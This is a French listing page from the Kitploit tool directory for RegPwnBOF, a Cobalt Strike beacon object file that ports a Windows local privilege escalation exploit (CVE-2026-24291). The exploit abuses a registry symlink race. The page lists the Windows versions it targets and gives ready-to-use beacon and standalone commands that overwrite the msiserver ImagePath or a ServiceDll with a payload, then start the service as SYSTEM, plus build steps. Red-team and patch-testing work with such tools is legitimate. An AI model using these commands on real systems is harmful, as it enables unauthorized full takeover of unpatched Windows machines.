Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RegPwnBOF — Bof de RegPwn par MDSec | Kitploit
Outils/GitHubGitHub/flangvik/regpwnbof
Escalade de PrivilègesExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubflangvik/regpwnbof

RegPwnBOF

Bof de RegPwn par MDSec

Voir le dépôt
12710il y a 5 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RegPwn BOF

Portage BOF Cobalt Strike de l'exploit RegPwn par Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.

Il s'agit d'une réimplémentation BOF bâclée de l'exploit C# original. Tout le crédit de la recherche de vulnérabilité et de l'exploit revient à Filip Dragovic et MDSec.

  • Article de blog : https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • Dépôt original : https://github.com/mdsecactivebreach/RegPwn
  • CVE : CVE-2026-24291

Fonctionnement

Exploite une condition de course de lien symbolique de registre dans le mécanisme ATConfig d'Accessibilité Windows pour écrire des valeurs arbitraires dans des clés de registre HKLM protégées depuis un contexte utilisateur normal (élévation de privilèges locale).

Cible Windows 11 25H2/24H2, Windows 10 21H2 et Windows Server 2016/2019/2022 avant le correctif de mars 2026.

ATTENTION : Cet exploit verrouille le poste de travail dans le cadre de la condition de course.

Cible par défaut

Le service msiserver (Windows Installer) ImagePath. Ce service s'exécute en tant que SYSTEM et peut être démarré par des utilisateurs normaux.

Utilisation

Cobalt Strike

Chargez regpwn.cna dans le Gestionnaire de scripts, puis :

root@kitploit:~
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

Test autonome

root@kitploit:~
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

Une fois l'exploit réussi, démarrez le service pour exécuter en tant que SYSTEM :

root@kitploit:~
net start msiserver

Compilation

Nécessite x86_64-w64-mingw32-gcc (compilateur croisé MinGW-w64).

root@kitploit:~
make        # build BOF (regpwn.x64.o)
make test   # build standalone EXE (regpwn.x64.exe)
make clean

x64 uniquement.

Télécharger l’outil